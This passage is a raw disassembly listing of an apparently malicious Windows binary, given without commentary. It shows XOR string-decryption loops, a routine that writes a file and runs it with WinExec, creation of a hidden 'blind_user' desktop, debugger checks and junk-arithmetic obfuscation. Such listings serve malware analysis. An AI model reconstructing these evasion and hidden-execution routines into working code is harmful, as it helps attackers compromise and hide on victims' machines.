call sub_4040FC
lea edi, [ebp+var_1201]
push edi
lea edi, [ebp+var_1300]
push edi
lea edi, [ebp+var_1300]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CA30
add esp, 1Ch
call sub_40C514 ; GetCurrentThreadId
lea ecx, [ebp+var_10FE]
or eax, 0FFFFFFFFh
loc_4043FC: ; CODE XREF: sub_404194+26D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4043FC
push 0
lea esi, [ebp+var_14AC]
push esi
push eax
lea edi, [ebp+var_10FE]
push edi
push ebx
call sub_40C730 ; WriteFile
push ebx
call sub_40C55C ; CloseHandle
mov ebx, 5F3Bh
mov eax, ebx
add eax, ebx
mov ebx, eax
push 8
push offset aINvuni ; "ŽīŽ"
call sub_4040FC
add esp, 8
lea edi, [ebp+var_1201]
push edi
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CA30
add esp, 10h
mov [ebp+var_1396], 0B7h
sub [ebp+var_1396], 77h
push 0
lea eax, [ebp+var_10FE]
push eax
call sub_40C724 ; WinExec
mov [ebp+var_1397], 22h
sub [ebp+var_1397], 6Ch
pop edi
pop esi
pop ebx
leave
retn
sub_404194 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 20Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_441248
lea eax, ds:42FD00h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-8], 331h
xor edi, edi
jmp short loc_4044D6
; ---------------------------------------------------------------------------
loc_4044BC: ; CODE XREF: .text:004044D8�j
mov eax, dword_441248
add eax, edi
lea eax, ds:42FD00h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Fh
mov [eax], dl
inc edi
loc_4044D6: ; CODE XREF: .text:004044BA�j
cmp edi, esi
jl short loc_4044BC
mov eax, dword_441248
add eax, esi
mov byte ptr ds:dword_42FD00[eax], 0
mov edi, dword_441248
inc dword_441248
mov eax, dword_441248
lea eax, [eax+esi+6]
mov dword_441248, eax
add dword_441248, 2
cmp dword_441248, 0DFDh
jle short loc_40451D
and dword_441248, 0
loc_40451D: ; CODE XREF: .text:00404514�j
lea eax, dword_42FD00[edi]
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
sub_404525 proc near ; DATA XREF: sub_43E731+A6�o
leave
retn
sub_404525 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404527 proc near ; CODE XREF: sub_4062CD+21B�p
; sub_408BE4+13D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
cmp dword_44124C, 0
jz short loc_40456A
mov [ebp+var_C], 30A1h
inc [ebp+var_C]
call sub_40C514 ; GetCurrentThreadId
push eax
call sub_40C838 ; GetThreadDesktop
mov [ebp+var_10], eax
call sub_40C598 ; GetTickCount
mov eax, dword_44124C
cmp [ebp+var_10], eax
jnz short loc_40459E
xor eax, eax
inc eax
jmp short loc_4045B2
; ---------------------------------------------------------------------------
loc_40456A: ; CODE XREF: sub_404527+15�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
sub_404527 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40457C proc near ; DATA XREF: sub_43E731+E0�o
call sub_40C820 ; CreateDesktopA
mov dword_44124C, eax
sub_40457C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404586 proc near ; DATA XREF: sub_43E731+476�o
lea edi, [ebp-8]
lea esi, aK0iJ_0 ; " K0i=J "
movsd
movsd
cmp dword_44124C, 0
jnz short loc_40459E
xor eax, eax
jmp short loc_4045B2
; ---------------------------------------------------------------------------
loc_40459E: ; CODE XREF: sub_404527+3C�j
; sub_404586+12�j
push dword_44124C
call sub_40C82C ; SetThreadDesktop
mov ebx, eax
call sub_40C5A4 ; GetVersion
mov eax, ebx
loc_4045B2: ; CODE XREF: sub_404527+41�j
; sub_404586+16�j
pop edi
pop esi
pop ebx
leave
retn
sub_404586 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B7 proc near ; CODE XREF: sub_4062CD+2A2�p
; sub_408BE4+18F�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
mov [ebp+var_2], 294Bh
movzx eax, [ebp+var_2]
imul eax, 2277h
mov [ebp+var_2], ax
leave
retn
sub_4045B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045E2 proc near ; CODE XREF: sub_404663+53�p
; sub_404663+97�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
sub_4045E2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045EF proc near ; DATA XREF: sub_43E731+4B8�o
mov eax, dword_441260
lea eax, ds:416690h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 249h
xor edi, edi
jmp short loc_404626
; ---------------------------------------------------------------------------
loc_40460F: ; CODE XREF: sub_4045EF+39�j
mov eax, dword_441260
add eax, edi
lea eax, ds:416690h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Ch
mov [eax], dl
inc edi
loc_404626: ; CODE XREF: sub_4045EF+1E�j
cmp edi, esi
jl short loc_40460F
mov eax, dword_441260
add eax, esi
mov byte ptr ds:dword_416690[eax], 0
mov edi, dword_441260
mov eax, edi
add eax, 6
add eax, esi
mov dword_441260, eax
cmp eax, 0DACh
jle short loc_404659
and dword_441260, 0
loc_404659: ; CODE XREF: sub_4045EF+61�j
lea eax, dword_416690[edi]
pop edi
pop esi
leave
retn
sub_4045EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404663 proc near ; CODE XREF: sub_405601+6DB�p
; sub_405601+784�p ...
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10A = byte ptr -10Ah
var_109 = dword ptr -109h
var_105 = byte ptr -105h
var_103 = byte ptr -103h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C634 ; IsDebuggerPresent
push [ebp+arg_4]
push ebx
call sub_40CA54
add esp, 8
call sub_40C574 ; GetProcessHeap
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_40476E
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_FF], 0
call sub_40C634 ; IsDebuggerPresent
push 3
push offset dword_446504
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
lea edi, [ebp+var_10A]
lea esi, aUng9Q ; "unG9 Q"
mov ecx, 7
rep movsb
mov [ebp+var_103], 0
jmp short loc_40473C
; ---------------------------------------------------------------------------
loc_4046E1: ; CODE XREF: sub_404663+E1�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404735
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp+var_110], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_110]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
add esp, 18h
loc_404735: ; CODE XREF: sub_404663+8E�j
add [ebp+var_103], 1
loc_40473C: ; CODE XREF: sub_404663+7C�j
mov al, [ebp+var_103]
cmp al, 0Ah
jb short loc_4046E1
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40CA54
push 3
push offset off_4464FB
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 18h
loc_40476E: ; CODE XREF: sub_404663+35�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404855
mov eax, dword_44126B
mov [ebp+var_109], eax
push 10h
push offset word_4464EA
call sub_4045E2
mov [ebp+var_110], eax
call sub_40CA18
mov [ebp+var_114], eax
call sub_40CA18
mov [ebp+var_118], eax
call sub_40CA18
mov [ebp+var_11C], eax
call sub_40CA18
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp+var_11C]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_118]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_114]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_110]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
mov word ptr [ebp-104h], 6A38h
add word ptr [ebp-104h], 2C92h
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40CA54
add esp, 28h
mov [ebp+var_105], 0BDh
add [ebp+var_105], 1
loc_404855: ; CODE XREF: sub_404663+11B�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404905
mov eax, dword_44126F
mov [ebp+var_109+3], eax
push 0Ah
sub_404663 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404878 proc near ; DATA XREF: sub_43E731+55B�o
push offset byte_4464DF
call sub_4045E2
mov [ebp-10Ch], eax
call sub_40CA18
mov [ebp-110h], eax
call sub_40CA18
mov [ebp-114h], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-114h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-110h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-10Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CA54
add esp, 24h
loc_404905: ; CODE XREF: sub_404663+202�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40492D
push 2
push offset aAf ; "af"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_40492D: ; CODE XREF: sub_404878+9D�j
mov word ptr [ebp-102h], 140Ah
movzx eax, word ptr [ebp-102h] ; DATA XREF: sub_43E731+41D�r
imul eax, 5B3Bh
mov [ebp-102h], ax
pop edi
pop esi
pop ebx
leave
retn
sub_404878 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40494F proc near ; CODE XREF: sub_405601+19F�p
; sub_405601+1BD�p ...
var_122 = dword ptr -122h
var_11E = word ptr -11Eh
var_105 = byte ptr -105h
var_104 = word ptr -104h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_104], 30D1h
movzx eax, [ebp+var_104]
imul eax, 4FD6h
mov [ebp+var_104], ax
push [ebp+arg_4]
push ebx
call sub_40CA54
add esp, 8
mov [ebp+var_105], 34h
sub [ebp+var_105], 75h
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404B75
mov eax, dword_441273
mov [ebp+var_122], eax
mov [ebp+var_FF], 0
mov [ebp+var_11E], 6E30h
movzx eax, [ebp+var_11E]
imul eax, 1271h
mov [ebp+var_11E], ax
push 5
push offset aPmaal ; "PMAAL"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
sub_40494F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4049F0 proc near ; DATA XREF: sub_43E731+2A�o
mov byte ptr [ebp-11Bh], 0
jmp loc_404B3F
sub_4049F0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404A38
loc_4049FC: ; CODE XREF: sub_404A38+10F�j
mov byte ptr [ebp-129h], 28h
sub byte ptr [ebp-129h], 0A9h
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404A5E
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-130h], eax
call sub_40CA18
mov ecx, 1Ah
; END OF FUNCTION CHUNK FOR sub_404A38
; =============== S U B R O U T I N E =======================================
sub_404A38 proc near ; DATA XREF: sub_43F132+12�o
; FUNCTION CHUNK AT 004049FC SIZE 0000003C BYTES
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-130h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404A5E: ; CODE XREF: sub_404A38-1E�j
mov dword ptr [ebp-128h], 1B00h
mov eax, [ebp-128h]
mov edx, eax
add edx, eax
mov [ebp-128h], edx
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404ACC
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-134h], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-134h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404ACC: ; CODE XREF: sub_404A38+50�j
call sub_40C514 ; GetCurrentThreadId
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 7
jge short loc_404B25
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-138h], eax
call sub_40CA18
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-138h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404B25: ; CODE XREF: sub_404A38+A9�j
lea edi, [ebp-12Ch]
lea esi, byte_441277
mov ecx, 3
rep movsb
add byte ptr [ebp-11Bh], 1
loc_404B3F: ; CODE XREF: sub_4049F0+7�j
mov al, [ebp-11Bh]
cmp al, 0Ah
jb loc_4049FC
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CA54
call sub_40C538 ; RtlGetLastWin32Error
push 4
push offset aAarl ; "AARL"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 18h
loc_404B75: ; CODE XREF: sub_40494F+56�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
sub_404A38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404B85 proc near ; DATA XREF: .data:0043F38E�o
; .data:0043F3B5�o ...
jge loc_404CFD
call sub_40C574 ; GetProcessHeap
mov byte ptr [ebp-0FFh], 0
call sub_40C574 ; GetProcessHeap
mov byte ptr [ebp-11Bh], 0
jmp loc_404CD1
; ---------------------------------------------------------------------------
loc_404BA8: ; CODE XREF: sub_404B85+154�j
call sub_40C538 ; RtlGetLastWin32Error
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404C01
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-12Ch], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-12Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404C01: ; CODE XREF: sub_404B85+38�j
mov eax, dword_44127A
mov [ebp-127h], eax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404C60
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-130h], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-130h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404C60: ; CODE XREF: sub_404B85+97�j
lea edi, [ebp-128h]
lea esi, byte_44127E
xor ecx, ecx
inc ecx
rep movsb
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_404CC5
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-134h], eax
call sub_40CA18
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-134h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404CC5: ; CODE XREF: sub_404B85+FC�j
call sub_40C508 ; GetCurrentProcessId
add byte ptr [ebp-11Bh], 1
loc_404CD1: ; CODE XREF: sub_404B85+1E�j
mov al, [ebp-11Bh]
cmp al, 32h
jb loc_404BA8
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CA54
add esp, 8
lea edi, [ebp-123h]
lea esi, aC6kP9 ; "C6k|P=9"
movsd
movsd
loc_404CFD: ; CODE XREF: sub_404B85�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short sub_404D25
push 4
push offset dword_4464CC
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
sub_404B85 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D25 proc near ; CODE XREF: sub_404B85+188�j
; DATA XREF: .data:0043F01D�o ...
call sub_40C598 ; GetTickCount
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D52
sub_404D25 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D3C proc near ; DATA XREF: .data:0043EF74�o
push 3
push offset dword_4464C8
call sub_4045E2
push eax
sub_404D3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D49 proc near ; DATA XREF: .data:0043EF1A�o
push ebx
call sub_40CA54
add esp, 10h
loc_404D52: ; CODE XREF: sub_404D25+15�j
mov byte ptr [ebp-106h], 0D0h
movzx eax, byte ptr [ebp-106h]
imul eax, 7F98h
mov [ebp-106h], al
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D94
push 3
push offset dword_4464C4
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404D94: ; CODE XREF: sub_404D49+33�j
lea edi, [ebp-10Ch]
lea esi, a04Ku ; "04 kU"
mov ecx, 3
rep movsw
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404DD0
push 3
push offset dword_4464C0
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404DD0: ; CODE XREF: sub_404D49+6F�j
call sub_40C574 ; GetProcessHeap
call sub_40CA18
mov ecx, 0Ah
sub_404D49 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DDF proc near ; DATA XREF: .data:0043E3F0�o
cdq
idiv ecx
cmp edx, 5
sub_404DDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DE5 proc near ; DATA XREF: sub_43E245:loc_43E2AA�o
jge short loc_404DFD
push 4
push offset byte_4464BB
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404DFD: ; CODE XREF: sub_404DE5�j
mov word ptr [ebp-102h], 342h
movzx eax, word ptr [ebp-102h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-102h], ax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E42
push 4
push offset word_4464B6
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404E42: ; CODE XREF: sub_404DE5+45�j
mov ax, word_44128D
mov [ebp-10Eh], ax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E77
push 4
push offset byte_4464B1
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404E77: ; CODE XREF: sub_404DE5+7A�j
lea edi, [ebp-113h]
lea esi, aVpa1 ; "PA1"
mov ecx, 5
rep movsb
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EB2
push 7
push offset byte_4464A9
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404EB2: ; CODE XREF: sub_404DE5+B5�j
lea edi, [ebp-118h]
lea esi, a@0y ; "@0Y "
mov ecx, 5
rep movsb
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EED
push 8
push offset dword_4464A0
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404EED: ; CODE XREF: sub_404DE5+F0�j
mov ax, word_441299
mov [ebp-11Ah], ax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F22
push 9
push offset word_446496
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404F22: ; CODE XREF: sub_404DE5+125�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F4A
push 2
push offset aAf ; "af"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404F4A: ; CODE XREF: sub_404DE5+14D�j
pop edi
pop esi
pop ebx
leave
retn
sub_404DE5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F4F proc near ; CODE XREF: sub_404FEF+64�p
; sub_404FEF+A6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 138h
push esi
push [ebp+arg_0]
mov eax, dword_4412A4
lea eax, ds:435040h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_404F94
; ---------------------------------------------------------------------------
loc_404F7D: ; CODE XREF: sub_404F4F+47�j
mov eax, dword_4412A4
add eax, edi
lea eax, ds:435040h[eax]
movsx edx, byte ptr [eax]
xor edx, 31h
mov [eax], dl
inc edi
loc_404F94: ; CODE XREF: sub_404F4F+2C�j
cmp edi, esi
jl short loc_404F7D
mov eax, dword_4412A4
add eax, esi
mov byte ptr ds:dword_435040[eax], 0
xor edi, edi
mov edi, dword_4412A4
inc dword_4412A4
mov eax, dword_4412A4
add eax, 3
add eax, esi
mov dword_4412A4, eax
add dword_4412A4, 2
cmp dword_4412A4, 0DCBh
jle short loc_404FDE
and dword_4412A4, 0
loc_404FDE: ; CODE XREF: sub_404F4F+86�j
mov [ebp+var_8], 199h
lea eax, dword_435040[edi]
pop edi
pop esi
leave
retn
sub_404F4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FEF proc near ; CODE XREF: sub_40518F+A5�p
var_2C = dword ptr -2Ch
var_25 = byte ptr -25h
var_24 = dword ptr -24h
var_1F = word ptr -1Fh
var_1D = dword ptr -1Dh
var_19 = byte ptr -19h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
lea edi, [ebp+var_19]
lea esi, aU ; ":U*~"
mov ecx, 5
rep movsb
call sub_40C508 ; GetCurrentProcessId
xor ebx, ebx
inc ebx
push [ebp+arg_0]
call sub_40C97C ; GetSidIdentifierAuthority
mov [ebp+var_14], eax
mov eax, dword_4412AD
mov [ebp+var_1D], eax
push [ebp+arg_0]
call sub_40C994 ; GetSidSubAuthorityCount
movzx edi, byte ptr [eax]
mov [ebp+var_10], edi
call sub_40C514 ; GetCurrentThreadId
mov eax, 0Ch
mul [ebp+var_10]
mov [ebp+var_24], eax
add eax, 1Ch
mov [ebp+var_C], eax
call sub_40C634 ; IsDebuggerPresent
push 6
push offset byte_44648F
call sub_404F4F
push ebx
push eax
push [ebp+arg_4]
call sub_40C868 ; wsprintfA
add esp, 14h
mov [ebp+var_C], eax
mov ax, word_4412B1
mov [ebp+var_1F], ax
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_14]
cmp byte ptr [eax], 0
jnz short loc_405089
cmp byte ptr [eax+1], 0
jz short loc_4050E7
loc_405089: ; CODE XREF: sub_404FEF+92�j
call sub_40C574 ; GetProcessHeap
push 20h
push offset word_44646E
call sub_404F4F
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx esi, si
push esi
movzx esi, byte ptr [edi+4]
movzx esi, si
push esi
movzx esi, byte ptr [edi+3]
movzx esi, si
push esi
movzx esi, byte ptr [edi+2]
movzx esi, si
push esi
movzx esi, byte ptr [edi+1]
movzx esi, si
push esi
movzx edi, byte ptr [edi]
movzx edi, di
push edi
push eax
push [ebp+var_8]
call sub_40C868 ; wsprintfA
add esp, 28h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
jmp short loc_405139
; ---------------------------------------------------------------------------
loc_4050E7: ; CODE XREF: sub_404FEF+98�j
call sub_40C508 ; GetCurrentProcessId
push 3
push offset off_44646A
call sub_404F4F
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx edx, byte ptr [edi+4]
shl edx, 8
add esi, edx
movzx edx, byte ptr [edi+3]
shl edx, 10h
add esi, edx
movzx edi, byte ptr [edi+2]
shl edi, 18h
add esi, edi
push esi
push eax
push [ebp+var_8]
call sub_40C868 ; wsprintfA
add esp, 14h
mov ebx, eax
call sub_40C634 ; IsDebuggerPresent
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
loc_405139: ; CODE XREF: sub_404FEF+F6�j
and [ebp+var_4], 0
jmp short loc_405182
; ---------------------------------------------------------------------------
loc_40513F: ; CODE XREF: sub_404FEF+199�j
mov [ebp+var_25], 81h
add [ebp+var_25], 0F0h
push 4
push offset byte_446465
call sub_404F4F
mov [ebp+var_2C], eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40C988 ; GetSidSubAuthority
push dword ptr [eax]
mov edi, [ebp+var_2C]
push edi
push [ebp+var_8]
call sub_40C868 ; wsprintfA
add esp, 14h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
inc [ebp+var_4]
loc_405182: ; CODE XREF: sub_404FEF+14E�j
mov eax, [ebp+var_10]
cmp [ebp+var_4], eax
jb short loc_40513F
pop edi
pop esi
pop ebx
leave
retn
sub_404FEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40518F proc near ; CODE XREF: sub_405F79+218�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
call sub_40C514 ; GetCurrentThreadId
call sub_40C508 ; GetCurrentProcessId
mov [ebp+var_10], eax
call sub_40C508 ; GetCurrentProcessId
push [ebp+var_10]
push 0
push 1F0FFFh
call sub_40C670 ; OpenProcess
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 0F00FFh
push ebx
call sub_40C904 ; OpenProcessToken
mov [ebp+var_8], 2A34h
add [ebp+var_8], 17B3h
push ebx
call sub_40C55C ; CloseHandle
lea edi, [ebp+var_11]
lea esi, byte_4412B3
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_4412A0
add eax, 3FF5h
push eax
push 40h
call sub_40C64C ; LocalAlloc
mov ebx, eax
mov [ebp+var_C], 2D3Bh
mov eax, 2E30h
mul [ebp+var_C]
mov [ebp+var_1C], eax
mov [ebp+var_C], eax
lea eax, [ebp+var_18]
push eax
mov eax, dword_44129C
add eax, 4000h
push eax
push ebx
push 1
push [ebp+var_4]
call sub_40C910 ; GetTokenInformation
push [ebp+arg_0]
push dword ptr [ebx]
call sub_404FEF
add esp, 8
call sub_40C508 ; GetCurrentProcessId
push ebx
call sub_40C658 ; LocalFree
push [ebp+var_4]
call sub_40C55C ; DATA XREF: sub_43F53D�r
pop edi
loc_405250: ; DATA XREF: sub_43F549�r
pop esi
pop ebx
leave
retn
sub_40518F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405254 proc near ; CODE XREF: sub_4053A1+3E�p
; sub_4053A1+AD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch ; DATA XREF: sub_43F561�r
push esi
push edi
loc_40525C: ; DATA XREF: sub_43F56D�r
mov esi, [ebp+arg_4]
mov [ebp+var_4], 2 ; DATA XREF: sub_43F579�r sub_43F585�r
push esi
push [ebp+arg_0] ; DATA XREF: sub_43F591�r
mov eax, dword_4412BC ; DATA XREF: sub_43F59D�r
